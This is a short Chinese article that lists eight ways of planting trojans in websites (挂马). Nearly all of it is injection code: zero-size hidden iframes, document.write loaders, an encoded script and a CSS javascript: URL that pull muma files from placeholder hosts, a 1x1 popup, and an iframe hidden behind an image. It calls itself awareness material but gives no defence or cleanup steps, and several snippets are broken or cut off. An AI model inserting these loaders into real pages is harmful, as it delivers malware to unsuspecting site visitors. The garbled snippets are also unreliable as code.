网站是怎么被挂马的

    网站一旦被黑客挂马，不仅影响访客对网站的体验度，也影响搜索引擎的友好度还容易被惩罚，做网站的人都觉得网站被挂了木马是个绝顶头痛的事情！那么你知道你的网站是如何被挂马的吗？一起来学习一下：

    一:框架挂马

    <iframe src=地址 width=0 height=0></iframe>

    二:js文件挂马

    首先将以下代码
    document.write("<iframe width='0' height='0' src='地址'></iframe>");
    保存为xxx.js，
    则JS挂马代码为
    <script language=javascript src=xxx.js></script>

    三:js变形加密

    <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
    muma.txt可改成任意后缀

    四:body挂马

    <body ></body>

    五:隐蔽挂马

    top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src=";
 
    六:css中挂马

    body {
    background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

    七:JAJA挂马

    <SCRIPT language=javascript>
    window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
    </script>

    八:图片伪装

    <html>
    <iframe src="网马地址" height=0 width=0></iframe>
    <img src="图片地址"></center>
    </html>